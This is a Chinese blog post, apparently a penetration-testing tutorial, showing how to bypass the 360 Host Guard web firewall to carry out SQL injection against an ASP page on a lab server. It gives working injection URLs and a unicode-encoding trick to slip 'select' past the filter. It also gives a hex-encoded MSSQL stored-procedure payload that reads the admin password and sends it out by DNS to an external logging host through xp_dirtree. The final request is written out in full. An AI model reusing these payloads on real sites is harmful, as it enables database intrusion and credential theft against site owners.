bypass最新版360主机卫士继续注入


Jun 29 2017

bypass最新版360主机卫士继续注入

首页 » 渗透测试 » bypass最新版360主机卫士继续注入   

序言

  主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务。这么多年因为主机卫士的存在,让我们站长一直免于被黑客攻击。不过任何一款软件都会有不足的地方,今天
  测试流程

  1 我们先直接加上单引号试试:
  1. http://192.168.0.20/conn.asp?id=1%27
复制代码
   
bypass最新版360主机卫士继续注入-1-存储架构-360主机卫士,主机卫士
   2 那我们继续测试,and 1=1 和and 1=2,被拦截了。这个时候,我们可以看看到底是什么规则,发现每一个单独提交都不被拦截,组合到一起便被拦截了,好,那我们变通一下,用+代替空格
   
bypass最新版360主机卫士继续注入-2-存储架构-360主机卫士,主机卫士
   3 查看数据库版本
   
bypass最新版360主机卫士继续注入-3-存储架构-360主机卫士,主机卫士
   4 查看数据库用户
   
bypass最新版360主机卫士继续注入-4-存储架构-360主机卫士,主机卫士
   5 查看当前数据库名称
   
bypass最新版360主机卫士继续注入-5-存储架构-360主机卫士,主机卫士
   6 查看数据库有多少数据库名称
  
  1. http://192.168.0.20/conn.asp?id=1+and+(SELECT+top+1+Name+FROM+Master..SysDatabases)
复制代码
  
bypass最新版360主机卫士继续注入-6-存储架构-360主机卫士,主机卫士

     7 我们从左至右,开始依次加sql注入的关键字,发现
   
bypass最新版360主机卫士继续注入-7-存储架构-360主机卫士,主机卫士
   8 主机卫士拦截表
   
bypass最新版360主机卫士继续注入-8-存储架构-360主机卫士,主机卫士
  
  9 寻求突破
  从上面的拦截表格可以看出,两个关键字的时候,只拦截select,那么我们试试三个关键字(无select)的时候,主机卫士会拦截什么?发现什么都不拦截,只会报语法错误。由此,我们得出一个结论,主机卫士一定会拦截select关键字,那么问题来了,他只拦截select吗?SeLeCt呢?经过不完全测试,发现当我们将select字符unicode编码后,不拦截
  1. http://192.168.0.20/conn.asp?id=1+and+%u0073%u0065%u006c%u0065%u0063%u0074
复制代码
  
bypass最新版360主机卫士继续注入-9-存储架构-360主机卫士,主机卫士

  但是,当我们尝试一次添加三个关键字的时候,主机卫士又拦截了(好累)。
  1. http://192.168.0.20/conn.asp?id=1+and+(%u0073%u0065%u006c%u0065%u0063%u0074+top
复制代码
  
bypass最新版360主机卫士继续注入-10-存储架构-360主机卫士,主机卫士

  10 利用存储过程
  mssql的存储过程定义为:
  1. Declare @s varchar(5000)  //申明变量@s 类型为varchar(5000)
  2. Set @  //给@s变量赋值
  3. Exec(@s) //执行@s
复制代码
那么,我们就需要试着在url中提交declare、set和exec,看看是否被拦截。
   
bypass最新版360主机卫士继续注入-11-存储架构-360主机卫士,主机卫士

  很好,没有被拦截,只是提示语法错误,那就证明我们可以利用存储过程去绕过主机卫士!我写了一个存储过程,内容如下(红色字体是需要另外修改的):
  1. declare @s varchar(5000),@host varchar(5000)
  2. set @s=(select password from waf_test.dbo.admin where username='admin')
  3. set@host=CONVERT(varchar(5000),@s)+'.xxxx.ceye.io';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"')
复制代码
将这个存储过程转换成十六进制如下:
  1. 0x6465636c61726520407320766172636861722835303030292c40686f73742076617263686172283530303029207365742040733d2873656c6563742070617373776f72642066726f6d207761665f746573742e64626f2e61646d696e20776865726520757365726e616d653d2761646d696e2729207365742040686f73743d434f4e5645525428766172636861722835303030292c4073292b272e787878782e636579652e696f273b4558454328276d61737465722e2e78705f6469727472656520225c5c272b40686f73742b275c666f6f62617224222729
复制代码
最终我们的请求为:
  1. http://192.168.0.124/conn.asp?id=1;declare+@h+varchar(5000)+set+@h=0x6465636c61726520407320766172636861722835303030292c40686f73742076617263686172283530303029207365742040733d2873656c6563742070617373776f72642066726f6d207761665f746573742e64626f2e61646d696e20776865726520757365726e616d653d2761646d696e2729207365742040686f73743d434f4e5645525428766172636861722835303030292c4073292b272e787878782e636579652e696f273b4558454328276d61737465722e2e78705f6469727472656520225c5c272b40686f73742b275c666f6f62617224222729+exec(@h)
复制代码
    登陆dnslog,可以看到接收到了123456的子域名请求,这里的123456便是我在mssql数据库中admin账户的密码。具体看下图:
   
bypass最新版360主机卫士继续注入-12-存储架构-360主机卫士,主机卫士
  
  总结

  攻防是对立的,有攻才有防。所以想更好的防御要换位思考从黑客的角度来看攻击然后形成防御思维。在攻防研究中学习,在攻防实验中进步。让我们一起去迎接更好的每一天。
     喜欢我们就请长按下面的图片关注我们吧。
   
bypass最新版360主机卫士继续注入-13-存储架构-360主机卫士,主机卫士
  

by Sec-News http://wiki.ioin.in/url/3vOP

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «高级SQL注入:混淆和绕过 | 最近更新的过WAF(防火墙教程)»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~